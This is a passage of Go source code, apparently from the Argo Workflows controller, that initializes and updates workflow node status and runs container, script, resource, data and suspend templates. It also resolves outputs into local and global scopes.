return woc.getEstimator().EstimateNodeDuration(nodeName)
}
func (woc *wfOperationCtx) hasDaemonNodes() bool {
for _, node := range woc.wf.Status.Nodes {
if node.IsDaemoned() {
return true
}
}
return false
}
func (woc *wfOperationCtx) findTemplate(pod *apiv1.Pod) *wfv1.Template {
nodeName := pod.Annotations[common.AnnotationKeyNodeName]
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
return nil // I don't expect this to happen in production, just in tests
}
return woc.wf.GetTemplateByName(node.TemplateName)
}
func (woc *wfOperationCtx) markWorkflowRunning(ctx context.Context) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowRunning, "")
}
func (woc *wfOperationCtx) markWorkflowSuccess(ctx context.Context) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowSucceeded, "")
}
func (woc *wfOperationCtx) markWorkflowFailed(ctx context.Context, message string) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowFailed, message)
}
func (woc *wfOperationCtx) markWorkflowError(ctx context.Context, err error) {
woc.markWorkflowPhase(ctx, wfv1.WorkflowError, err.Error())
}
// stepsOrDagSeparator identifies if a node name starts with our naming convention separator from
// DAG or steps templates. Will match stings with prefix like: [0]. or .
var stepsOrDagSeparator = regexp.MustCompile(`^(\[\d+\])?\.`)
// initializeExecutableNode initializes a node and stores the template.
func (woc *wfOperationCtx) initializeExecutableNode(nodeName string, nodeType wfv1.NodeType, templateScope string, executeTmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, phase wfv1.NodePhase, messages ...string) *wfv1.NodeStatus {
node := woc.initializeNode(nodeName, nodeType, templateScope, orgTmpl, boundaryID, phase)
// Set the input values to the node.
if executeTmpl.Inputs.HasInputs() {
node.Inputs = executeTmpl.Inputs.DeepCopy()
}
if nodeType == wfv1.NodeTypeSuspend {
node = addRawOutputFields(node, executeTmpl)
}
if len(messages) > 0 {
node.Message = messages[0]
}
// Update the node
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
return node
}
// initializeNodeOrMarkError initializes an error node or mark a node if it already exists.
func (woc *wfOperationCtx) initializeNodeOrMarkError(node *wfv1.NodeStatus, nodeName string, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, err error) *wfv1.NodeStatus {
if node != nil {
return woc.markNodeError(nodeName, err)
}
return woc.initializeNode(nodeName, wfv1.NodeTypeSkipped, templateScope, orgTmpl, boundaryID, wfv1.NodeError, err.Error())
}
// Creates a node status that is or will be cached
func (woc *wfOperationCtx) initializeCacheNode(nodeName string, resolvedTmpl *wfv1.Template, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, memStat *wfv1.MemoizationStatus, messages ...string) *wfv1.NodeStatus {
if resolvedTmpl.Memoize == nil {
err := fmt.Errorf("cannot initialize a cached node from a non-memoized template")
woc.log.WithFields(log.Fields{"namespace": woc.wf.Namespace, "wfName": woc.wf.Name}).WithError(err)
panic(err)
}
woc.log.Debug("Initializing cached node ", nodeName, common.GetTemplateHolderString(orgTmpl), boundaryID)
node := woc.initializeExecutableNode(nodeName, wfutil.GetNodeType(resolvedTmpl), templateScope, resolvedTmpl, orgTmpl, boundaryID, wfv1.NodePending, messages...)
node.MemoizationStatus = memStat
return node
}
// Creates a node status that has been cached, completely initialized, and marked as finished
func (woc *wfOperationCtx) initializeCacheHitNode(nodeName string, resolvedTmpl *wfv1.Template, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, outputs *wfv1.Outputs, memStat *wfv1.MemoizationStatus, messages ...string) *wfv1.NodeStatus {
node := woc.initializeCacheNode(nodeName, resolvedTmpl, templateScope, orgTmpl, boundaryID, memStat, messages...)
node.Phase = wfv1.NodeSucceeded
node.Outputs = outputs
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
return node
}
func (woc *wfOperationCtx) initializeNode(nodeName string, nodeType wfv1.NodeType, templateScope string, orgTmpl wfv1.TemplateReferenceHolder, boundaryID string, phase wfv1.NodePhase, messages ...string) *wfv1.NodeStatus {
woc.log.Debugf("Initializing node %s: template: %s, boundaryID: %s", nodeName, common.GetTemplateHolderString(orgTmpl), boundaryID)
nodeID := woc.wf.NodeID(nodeName)
_, ok := woc.wf.Status.Nodes[nodeID]
if ok {
panic(fmt.Sprintf("node %s already initialized", nodeName))
}
node := wfv1.NodeStatus{
ID: nodeID,
Name: nodeName,
TemplateName: orgTmpl.GetTemplateName(),
TemplateRef: orgTmpl.GetTemplateRef(),
TemplateScope: templateScope,
Type: nodeType,
BoundaryID: boundaryID,
Phase: phase,
StartedAt: metav1.Time{Time: time.Now().UTC()},
EstimatedDuration: woc.estimateNodeDuration(nodeName),
}
if boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]; ok {
node.DisplayName = strings.TrimPrefix(node.Name, boundaryNode.Name)
if stepsOrDagSeparator.MatchString(node.DisplayName) {
node.DisplayName = stepsOrDagSeparator.ReplaceAllString(node.DisplayName, "")
}
} else {
node.DisplayName = nodeName
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
node.FinishedAt = node.StartedAt
}
var message string
if len(messages) > 0 {
message = fmt.Sprintf(" (message: %s)", messages[0])
node.Message = messages[0]
}
woc.wf.Status.Nodes[nodeID] = node
woc.log.Infof("%s node %v initialized %s%s", node.Type, node.ID, node.Phase, message)
woc.updated = true
return &node
}
// markNodePhase marks a node with the given phase, creating the node if necessary and handles timestamps
func (woc *wfOperationCtx) markNodePhase(nodeName string, phase wfv1.NodePhase, message ...string) *wfv1.NodeStatus {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
panic(fmt.Sprintf("workflow '%s' node '%s' uninitialized when marking as %v: %s", woc.wf.Name, nodeName, phase, message))
}
if node.Phase != phase {
if node.Phase.Fulfilled() {
woc.log.WithFields(log.Fields{"nodeName": node.Name, "fromPhase": node.Phase, "toPhase": phase}).
Error("node is already fulfilled")
}
woc.log.Infof("node %s phase %s -> %s", node.ID, node.Phase, phase)
node.Phase = phase
woc.updated = true
}
if len(message) > 0 {
if message[0] != node.Message {
woc.log.Infof("node %s message: %s", node.ID, message[0])
node.Message = message[0]
woc.updated = true
}
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
woc.log.Infof("node %s finished: %s", node.ID, node.FinishedAt)
woc.updated = true
}
woc.wf.Status.Nodes[node.ID] = *node
return node
}
func (woc *wfOperationCtx) recordNodePhaseEvent(node *wfv1.NodeStatus) {
message := fmt.Sprintf("%v node %s", node.Phase, node.Name)
if node.Message != "" {
message = message + ": " + node.Message
}
eventType := apiv1.EventTypeWarning
switch node.Phase {
case wfv1.NodeSucceeded, wfv1.NodeRunning:
eventType = apiv1.EventTypeNormal
}
woc.eventRecorder.AnnotatedEventf(
woc.wf,
map[string]string{
common.AnnotationKeyNodeType: string(node.Type),
common.AnnotationKeyNodeName: node.Name,
},
eventType,
fmt.Sprintf("WorkflowNode%s", node.Phase),
message,
)
}
// recordNodePhaseChangeEvents creates WorkflowNode Kubernetes events for each node
// that has changes logged during this execution of the operator loop.
func (woc *wfOperationCtx) recordNodePhaseChangeEvents(old wfv1.Nodes, new wfv1.Nodes) {
if !woc.controller.Config.NodeEvents.IsEnabled() {
return
}
// Check for newly added nodes; send an event for new nodes
for nodeName, newNode := range new {
oldNode, exists := old[nodeName]
if exists {
if oldNode.Phase == newNode.Phase {
continue
}
if oldNode.Phase == wfv1.NodePending && newNode.Completed() {
ephemeralNode := newNode.DeepCopy()
ephemeralNode.Phase = wfv1.NodeRunning
woc.recordNodePhaseEvent(ephemeralNode)
}
woc.recordNodePhaseEvent(&newNode)
} else {
if newNode.Phase == wfv1.NodeRunning {
woc.recordNodePhaseEvent(&newNode)
} else if newNode.Completed() {
ephemeralNode := newNode.DeepCopy()
ephemeralNode.Phase = wfv1.NodeRunning
woc.recordNodePhaseEvent(ephemeralNode)
woc.recordNodePhaseEvent(&newNode)
}
}
}
}
// markNodeError is a convenience method to mark a node with an error and set the message from the error
func (woc *wfOperationCtx) markNodeError(nodeName string, err error) *wfv1.NodeStatus {
woc.log.WithError(err).WithField("nodeName", nodeName).Error("Mark error node")
return woc.markNodePhase(nodeName, wfv1.NodeError, err.Error())
}
// markNodePending is a convenience method to mark a node and set the message from the error
func (woc *wfOperationCtx) markNodePending(nodeName string, err error) *wfv1.NodeStatus {
woc.log.Infof("Mark node %s as Pending, due to: %v", nodeName, err)
return woc.markNodePhase(nodeName, wfv1.NodePending, err.Error()) // this error message will not change often
}
// markNodeWaitingForLock is a convenience method to mark that a node is waiting for a lock
func (woc *wfOperationCtx) markNodeWaitingForLock(nodeName string, lockName string) *wfv1.NodeStatus {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
return node
}
if node.SynchronizationStatus == nil {
node.SynchronizationStatus = &wfv1.NodeSynchronizationStatus{}
}
if lockName == "" {
// If we are no longer waiting for a lock, nil out the sync status
node.SynchronizationStatus = nil
} else {
node.SynchronizationStatus.Waiting = lockName
}
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
return node
}
// checkParallelism checks if the given template is able to be executed, considering the current active pods and workflow/template parallelism
func (woc *wfOperationCtx) checkParallelism(tmpl *wfv1.Template, node *wfv1.NodeStatus, boundaryID string) error {
if woc.execWf.Spec.Parallelism != nil && woc.activePods >= *woc.execWf.Spec.Parallelism {
woc.log.Infof("workflow active pod spec parallelism reached %d/%d", woc.activePods, *woc.execWf.Spec.Parallelism)
return ErrParallelismReached
}
// If we are a DAG or Steps template, check if we have active pods or unsuccessful children
if node != nil && (tmpl.GetType() == wfv1.TemplateTypeDAG || tmpl.GetType() == wfv1.TemplateTypeSteps) {
// Check failFast
if tmpl.IsFailFast() && woc.getUnsuccessfulChildren(node.ID) > 0 {
woc.markNodePhase(node.Name, wfv1.NodeFailed, "template has failed or errored children and failFast enabled")
return ErrParallelismReached
}
// Check parallelism
if tmpl.HasParallelism() && woc.getActivePods(node.ID) >= *tmpl.Parallelism {
woc.log.Infof("template (node %s) active children parallelism exceeded %d", node.ID, *tmpl.Parallelism)
return ErrParallelismReached
}
}
// if we are about to execute a pod, make sure our parent hasn't reached it's limit
if boundaryID != "" && (node == nil || (node.Phase != wfv1.NodePending && node.Phase != wfv1.NodeRunning)) {
boundaryNode, ok := woc.wf.Status.Nodes[boundaryID]
if !ok {
return errors.InternalError("boundaryNode not found")
}
tmplCtx, err := woc.createTemplateContext(boundaryNode.GetTemplateScope())
if err != nil {
return err
}
_, boundaryTemplate, templateStored, err := tmplCtx.ResolveTemplate(&boundaryNode)
if err != nil {
return err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
// Check failFast
if boundaryTemplate.IsFailFast() && woc.getUnsuccessfulChildren(boundaryID) > 0 {
woc.markNodePhase(boundaryNode.Name, wfv1.NodeFailed, "template has failed or errored children and failFast enabled")
return ErrParallelismReached
}
// Check parallelism
if boundaryTemplate.HasParallelism() && woc.getActiveChildren(boundaryID) >= *boundaryTemplate.Parallelism {
woc.log.Infof("template (node %s) active children parallelism exceeded %d", boundaryID, *boundaryTemplate.Parallelism)
return ErrParallelismReached
}
}
return nil
}
func (woc *wfOperationCtx) executeContainer(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
}
// Check if the output of this container is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
includeScriptOutput, err := woc.includeScriptOutput(nodeName, opts.boundaryID)
if err != nil {
return node, err
}
woc.log.Debugf("Executing node %s with container template: %v\n", nodeName, tmpl.Name)
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*tmpl.Container}, tmpl, &createWorkflowPodOpts{
includeScriptOutput: includeScriptOutput,
onExitPod: opts.onExitTemplate,
executionDeadline: opts.executionDeadline,
})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) getOutboundNodes(nodeID string) []string {
node := woc.wf.Status.Nodes[nodeID]
switch node.Type {
case wfv1.NodeTypeSkipped, wfv1.NodeTypeSuspend:
return []string{node.ID}
case wfv1.NodeTypeContainer, wfv1.NodeTypePod, wfv1.NodeTypeTaskGroup:
if len(node.Children) == 0 {
return []string{node.ID}
}
outboundNodes := make([]string, 0)
for _, child := range node.Children {
outboundNodes = append(outboundNodes, woc.getOutboundNodes(child)...)
}
return outboundNodes
case wfv1.NodeTypeRetry:
numChildren := len(node.Children)
if numChildren > 0 {
return []string{node.Children[numChildren-1]}
}
}
outbound := make([]string, 0)
for _, outboundNodeID := range node.OutboundNodes {
outbound = append(outbound, woc.getOutboundNodes(outboundNodeID)...)
}
return outbound
}
// getTemplateOutputsFromScope resolves a template's outputs from the scope of the template
func getTemplateOutputsFromScope(tmpl *wfv1.Template, scope *wfScope) (*wfv1.Outputs, error) {
if !tmpl.Outputs.HasOutputs() {
return nil, nil
}
var outputs wfv1.Outputs
if len(tmpl.Outputs.Parameters) > 0 {
outputs.Parameters = make([]wfv1.Parameter, 0)
for _, param := range tmpl.Outputs.Parameters {
if param.ValueFrom == nil {
return nil, fmt.Errorf("output parameters must have a valueFrom specified")
}
val, err := scope.resolveParameter(param.ValueFrom)
if err != nil {
// We have a default value to use instead of returning an error
if param.ValueFrom.Default != nil {
val = param.ValueFrom.Default.String()
} else {
return nil, err
}
}
param.Value = wfv1.AnyStringPtr(val)
param.ValueFrom = nil
outputs.Parameters = append(outputs.Parameters, param)
}
}
if len(tmpl.Outputs.Artifacts) > 0 {
outputs.Artifacts = make([]wfv1.Artifact, 0)
for _, art := range tmpl.Outputs.Artifacts {
resolvedArt, err := scope.resolveArtifact(&art)
if err != nil {
// If the artifact was not found and is optional, don't mark an error
if strings.Contains(err.Error(), "Unable to resolve") && art.Optional {
log.Warnf("Optional artifact '%s' was not found; it won't be available as an output", art.Name)
continue
}
return nil, fmt.Errorf("unable to resolve outputs from scope: %s", err)
}
resolvedArt.Name = art.Name
outputs.Artifacts = append(outputs.Artifacts, *resolvedArt)
}
}
return &outputs, nil
}
func generateOutputResultRegex(name string, parentTmpl *wfv1.Template) (string, string) {
referenceRegex := fmt.Sprintf(`\.%s\.outputs\.result`, name)
expressionRegex := fmt.Sprintf(`\[['\"]%s['\"]\]\.outputs.result`, name)
if parentTmpl.DAG != nil {
referenceRegex = "tasks" + referenceRegex
expressionRegex = "tasks" + expressionRegex
} else if parentTmpl.Steps != nil {
referenceRegex = "steps" + referenceRegex
expressionRegex = "steps" + expressionRegex
}
return referenceRegex, expressionRegex
}
// hasOutputResultRef will check given template output has any reference
func hasOutputResultRef(name string, parentTmpl *wfv1.Template) bool {
jsonValue, err := json.Marshal(parentTmpl)
if err != nil {
log.Warnf("Unable to marshal template %q: %v", parentTmpl, err)
}
// First consider usual case (e.g.: `value: "{{steps.generate.outputs.result}}"`)
// This is most common, so should be done first.
referenceRegex, expressionRegex := generateOutputResultRegex(name, parentTmpl)
contains, err := regexp.MatchString(referenceRegex, string(jsonValue))
if err != nil {
log.Warnf("Error in regex compilation %q: %v", referenceRegex, err)
}
if contains {
return true
}
// Next, consider expression case (e.g.: `expression: "steps['generate-random-1'].outputs.result"`)
contains, err = regexp.MatchString(expressionRegex, string(jsonValue))
if err != nil {
log.Warnf("Error in regex compilation %q: %v", expressionRegex, err)
}
return contains
}
// getStepOrDAGTaskName will extract the node from NodeStatus Name
func getStepOrDAGTaskName(nodeName string) string {
// Extract the task or step name by ignoring retry IDs and expanded IDs that are included in parenthesis at the end
// of a node. Example: ".fanout1(0:1)(0)[0]" -> "fanout"
// Opener is what opened our current parenthesis. Example: if we see a ")", our opener is a "("
opener := ""
loop:
for i := len(nodeName) - 1; i >= 0; i-- {
char := string(nodeName[i])
switch {
case char == opener:
// If we find the opener, we are no longer inside a parenthesis or bracket
opener = ""
case opener != "":
// If the opener is not empty, then we are inside a parenthesis or bracket
// Do nothing
case char == ")":
// We are going inside a parenthesis
opener = "("
case char == "]":
// We are going inside a bracket
opener = "["
default:
// If the current character is not a parenthesis or bracket, and we are not inside one already, we have found
// the end of the node name.
nodeName = nodeName[:i+1]
break loop
}
}
// If our node contains a dot, we're a child node. We're only interested in the step that called us, so return the
// name of the node after the last dot.
if lastDotIndex := strings.LastIndex(nodeName, "."); lastDotIndex >= 0 {
nodeName = nodeName[lastDotIndex+1:]
}
return nodeName
}
func (woc *wfOperationCtx) executeScript(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
// Check if the output of this script is referenced elsewhere in the Workflow. If so, make sure to include it during
// execution.
includeScriptOutput, err := woc.includeScriptOutput(nodeName, opts.boundaryID)
if err != nil {
return node, err
}
mainCtr := tmpl.Script.Container
mainCtr.Args = append(mainCtr.Args, common.ExecutorScriptSourcePath)
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{mainCtr}, tmpl, &createWorkflowPodOpts{
includeScriptOutput: includeScriptOutput,
onExitPod: opts.onExitTemplate,
executionDeadline: opts.executionDeadline,
})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) requeueIfTransientErr(err error, nodeName string) (*wfv1.NodeStatus, error) {
if errorsutil.IsTransientErr(err) || err == ErrResourceRateLimitReached {
// Our error was most likely caused by a lack of resources.
woc.requeue()
return woc.markNodePending(nodeName, err), nil
}
return nil, err
}
// buildLocalScope adds all of a nodes outputs to the local scope with the given prefix, as well
// as the global scope, if specified with a globalName
func (woc *wfOperationCtx) buildLocalScope(scope *wfScope, prefix string, node *wfv1.NodeStatus) {
// It may be that the node is a retry node, in which case we want to get the outputs of the last node
// in the retry group instead of the retry node itself.
if node.Type == wfv1.NodeTypeRetry {
node = getChildNodeIndex(node, woc.wf.Status.Nodes, -1)
}
if node.ID != "" {
key := fmt.Sprintf("%s.id", prefix)
scope.addParamToScope(key, node.ID)
}
if !node.StartedAt.Time.IsZero() {
key := fmt.Sprintf("%s.startedAt", prefix)
scope.addParamToScope(key, node.StartedAt.Time.Format(time.RFC3339))
}
if !node.FinishedAt.Time.IsZero() {
key := fmt.Sprintf("%s.finishedAt", prefix)
scope.addParamToScope(key, node.FinishedAt.Time.Format(time.RFC3339))
}
if node.PodIP != "" {
key := fmt.Sprintf("%s.ip", prefix)
scope.addParamToScope(key, node.PodIP)
}
if node.Phase != "" {
key := fmt.Sprintf("%s.status", prefix)
scope.addParamToScope(key, string(node.Phase))
}
woc.addOutputsToLocalScope(prefix, node.Outputs, scope)
}
func (woc *wfOperationCtx) addOutputsToLocalScope(prefix string, outputs *wfv1.Outputs, scope *wfScope) {
if outputs == nil || scope == nil {
return
}
if prefix != "workflow" && outputs.Result != nil {
scope.addParamToScope(fmt.Sprintf("%s.outputs.result", prefix), *outputs.Result)
}
if prefix != "workflow" && outputs.ExitCode != nil {
scope.addParamToScope(fmt.Sprintf("%s.exitCode", prefix), *outputs.ExitCode)
}
for _, param := range outputs.Parameters {
if param.Value != nil {
scope.addParamToScope(fmt.Sprintf("%s.outputs.parameters.%s", prefix, param.Name), param.Value.String())
}
}
for _, art := range outputs.Artifacts {
scope.addArtifactToScope(fmt.Sprintf("%s.outputs.artifacts.%s", prefix, art.Name), art)
}
}
func (woc *wfOperationCtx) addOutputsToGlobalScope(outputs *wfv1.Outputs) {
if outputs == nil {
return
}
for _, param := range outputs.Parameters {
woc.addParamToGlobalScope(param)
}
for _, art := range outputs.Artifacts {
woc.addArtifactToGlobalScope(art)
}
}
// loopNodes is a node list which supports sorting by loop index
type loopNodes []wfv1.NodeStatus
func (n loopNodes) Len() int {
return len(n)
}
func parseLoopIndex(s string) int {
s = strings.SplitN(s, "(", 2)[1]
s = strings.SplitN(s, ":", 2)[0]
val, err := strconv.Atoi(s)
if err != nil {
panic(fmt.Sprintf("failed to parse '%s' as int: %v", s, err))
}
return val
}
func (n loopNodes) Less(i, j int) bool {
left := parseLoopIndex(n[i].DisplayName)
right := parseLoopIndex(n[j].DisplayName)
return left < right
}
func (n loopNodes) Swap(i, j int) {
n[i], n[j] = n[j], n[i]
}
// processAggregateNodeOutputs adds the aggregated outputs of a withItems/withParam template as a
// parameter in the form of a JSON list
func (woc *wfOperationCtx) processAggregateNodeOutputs(tmpl *wfv1.Template, scope *wfScope, prefix string, childNodes []wfv1.NodeStatus) error {
if len(childNodes) == 0 {
return nil
}
// need to sort the child node list so that the order of outputs are preserved
sort.Sort(loopNodes(childNodes))
paramList := make([]map[string]string, 0)
outputParamValueLists := make(map[string][]string)
resultsList := make([]wfv1.Item, 0)
for _, node := range childNodes {
if node.Outputs == nil {
continue
}
if len(node.Outputs.Parameters) > 0 {
param := make(map[string]string)
for _, p := range node.Outputs.Parameters {
param[p.Name] = p.Value.String()
outputParamValueList := outputParamValueLists[p.Name]
outputParamValueList = append(outputParamValueList, p.Value.String())
outputParamValueLists[p.Name] = outputParamValueList
}
paramList = append(paramList, param)
}
if node.Outputs.Result != nil {
// Support the case where item may be a map
var item wfv1.Item
err := json.Unmarshal([]byte(*node.Outputs.Result), &item)
if err != nil {
return err
}
resultsList = append(resultsList, item)
}
}
if tmpl.GetType() == wfv1.TemplateTypeScript {
resultsJSON, err := json.Marshal(resultsList)
if err != nil {
return err
}
key := fmt.Sprintf("%s.outputs.result", prefix)
scope.addParamToScope(key, string(resultsJSON))
}
outputsJSON, err := json.Marshal(paramList)
if err != nil {
return err
}
key := fmt.Sprintf("%s.outputs.parameters", prefix)
scope.addParamToScope(key, string(outputsJSON))
// Adding per-output aggregated value placeholders
for outputName, valueList := range outputParamValueLists {
key = fmt.Sprintf("%s.outputs.parameters.%s", prefix, outputName)
valueListJSON, err := json.Marshal(valueList)
if err != nil {
return err
}
scope.addParamToScope(key, string(valueListJSON))
}
return nil
}
// addParamToGlobalScope exports any desired node outputs to the global scope, and adds it to the global outputs.
func (woc *wfOperationCtx) addParamToGlobalScope(param wfv1.Parameter) {
if param.GlobalName == "" {
return
}
paramName := fmt.Sprintf("workflow.outputs.parameters.%s", param.GlobalName)
if param.HasValue() {
woc.globalParams[paramName] = param.GetValue()
}
wfUpdated := wfutil.AddParamToGlobalScope(woc.wf, woc.log, param)
if wfUpdated {
woc.updated = true
}
}
// addArtifactToGlobalScope exports any desired node outputs to the global scope
// Optionally adds to a local scope if supplied
func (woc *wfOperationCtx) addArtifactToGlobalScope(art wfv1.Artifact) {
if art.GlobalName == "" {
return
}
globalArtName := fmt.Sprintf("workflow.outputs.artifacts.%s", art.GlobalName)
if woc.wf.Status.Outputs != nil {
for i, gArt := range woc.wf.Status.Outputs.Artifacts {
if gArt.Name == art.GlobalName {
// global output already exists. overwrite the value if different
art.Name = art.GlobalName
art.GlobalName = ""
art.Path = ""
if !reflect.DeepEqual(woc.wf.Status.Outputs.Artifacts[i], art) {
woc.wf.Status.Outputs.Artifacts[i] = art
woc.log.Infof("overwriting %s: %v", globalArtName, art)
woc.updated = true
}
return
}
}
} else {
woc.wf.Status.Outputs = &wfv1.Outputs{}
}
// global output does not yet exist
art.Name = art.GlobalName
art.GlobalName = ""
art.Path = ""
woc.log.Infof("setting %s: %v", globalArtName, art)
woc.wf.Status.Outputs.Artifacts = append(woc.wf.Status.Outputs.Artifacts, art)
woc.updated = true
}
// addChildNode adds a nodeID as a child to a parent
// parent and child are both node names
func (woc *wfOperationCtx) addChildNode(parent string, child string) {
parentID := woc.wf.NodeID(parent)
childID := woc.wf.NodeID(child)
node, ok := woc.wf.Status.Nodes[parentID]
if !ok {
panic(fmt.Sprintf("parent node %s not initialized", parent))
}
for _, nodeID := range node.Children {
if childID == nodeID {
// already exists
return
}
}
node.Children = append(node.Children, childID)
woc.wf.Status.Nodes[parentID] = node
woc.updated = true
}
// executeResource is runs a kubectl command against a manifest
func (woc *wfOperationCtx) executeResource(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
tmpl = tmpl.DeepCopy()
if tmpl.Resource.SetOwnerReference {
obj := unstructured.Unstructured{}
err := yaml.Unmarshal([]byte(tmpl.Resource.Manifest), &obj)
if err != nil {
return node, err
}
ownerReferences := obj.GetOwnerReferences()
obj.SetOwnerReferences(append(ownerReferences, *metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind))))
bytes, err := yaml.Marshal(obj.Object)
if err != nil {
return node, err
}
tmpl.Resource.Manifest = string(bytes)
}
mainCtr := woc.newExecContainer(common.MainContainerName, tmpl)
mainCtr.Command = []string{"argoexec", "resource", tmpl.Resource.Action}
_, err := woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*mainCtr}, tmpl, &createWorkflowPodOpts{onExitPod: opts.onExitTemplate, executionDeadline: opts.executionDeadline})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, err
}
func (woc *wfOperationCtx) executeData(ctx context.Context, nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypePod, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
} else if !node.Pending() {
return node, nil
}
dataTemplate, err := json.Marshal(tmpl.Data)
if err != nil {
return node, fmt.Errorf("could not marshal data in transformation: %w", err)
}
mainCtr := woc.newExecContainer(common.MainContainerName, tmpl)
mainCtr.Command = []string{"argoexec", "data", string(dataTemplate)}
_, err = woc.createWorkflowPod(ctx, nodeName, []apiv1.Container{*mainCtr}, tmpl, &createWorkflowPodOpts{onExitPod: opts.onExitTemplate, executionDeadline: opts.executionDeadline, includeScriptOutput: true})
if err != nil {
return woc.requeueIfTransientErr(err, node.Name)
}
return node, nil
}
func (woc *wfOperationCtx) executeSuspend(nodeName string, templateScope string, tmpl *wfv1.Template, orgTmpl wfv1.TemplateReferenceHolder, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
node := woc.wf.GetNodeByName(nodeName)
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfv1.NodeTypeSuspend, templateScope, tmpl, orgTmpl, opts.boundaryID, wfv1.NodePending)
}
woc.log.Infof("node %s suspended", nodeName)
// If there is either an active workflow deadline, or if this node is suspended with a duration, then the workflow
// will need to be requeued after a certain amount of time
var requeueTime *time.Time
if tmpl.Suspend.Duration != "" {
node := woc.wf.GetNodeByName(nodeName)
suspendDuration, err := parseStringToDuration(tmpl.Suspend.Duration)
if err != nil {
return node, err
}
suspendDeadline := node.StartedAt.Add(suspendDuration)
requeueTime = &suspendDeadline
if time.Now().UTC().After(suspendDeadline) {
// Suspension is expired, node can be resumed
woc.log.Infof("auto resuming node %s", nodeName)
_ = woc.markNodePhase(nodeName, wfv1.NodeSucceeded)
return node, nil
}
}
// workflowDeadline is the time when the workflow will be timed out, if any
if workflowDeadline := woc.getWorkflowDeadline(); workflowDeadline != nil {
// There is an active workflow deadline. If this node is suspended with a duration, choose the earlier time
// between the two, otherwise choose the deadline time.
if requeueTime == nil || workflowDeadline.Before(*requeueTime) {
requeueTime = workflowDeadline
}
}
if requeueTime != nil {
woc.requeueAfter(time.Until(*requeueTime))
}
_ = woc.markNodePhase(nodeName, wfv1.NodeRunning)
return node, nil
}
func addRawOutputFields(node *wfv1.NodeStatus, tmpl *wfv1.Template) *wfv1.NodeStatus {
if tmpl.GetType() != wfv1.TemplateTypeSuspend || node.Type != wfv1.NodeTypeSuspend {
panic("addRawOutputFields should only be used for nodes and templates of type suspend")
}
for _, param := range tmpl.Outputs.Parameters {
if param.ValueFrom.Supplied != nil {
if node.Outputs == nil {
node.Outputs = &wfv1.Outputs{Parameters: []wfv1.Parameter{}}
}
node.Outputs.Parameters = append(node.Outputs.Parameters, param)
}
}
return node
}
func parseStringToDuration(durationString string) (time.Duration, error) {
var suspendDuration time.Duration
// If no units are attached, treat as seconds
if val, err := strconv.Atoi(durationString); err == nil {
suspendDuration = time.Duration(val) * time.Second
} else if duration, err := time.ParseDuration(durationString); err == nil {
suspendDuration = duration
} else {
return 0, fmt.Errorf("unable to parse %s as a duration: %w", durationString, err)
}
return suspendDuration, nil
}
func processItem(tmpl template.Template, name string, index int, item wfv1.Item, obj interface{}) (string, error) {
replaceMap := make(map[string]string)
var newName string
switch item.GetType() {
case wfv1.String, wfv1.Number, wfv1.Bool:
replaceMap["item"] = fmt.Sprintf("%v", item)
newName = generateNodeName(name, index, item)
case wfv1.Map:
// Handle the case when withItems is a list of maps.
// vals holds stringified versions of the map items which are incorporated as part of the step name.
// For example if the item is: {"name": "jesse","group":"developer"}
// the vals would be: ["name:jesse", "group:developer"]
// This would eventually be part of the step name (group:developer,name:jesse)
vals := make([]string, 0)
mapVal := item.GetMapVal()
for itemKey, itemVal := range mapVal {
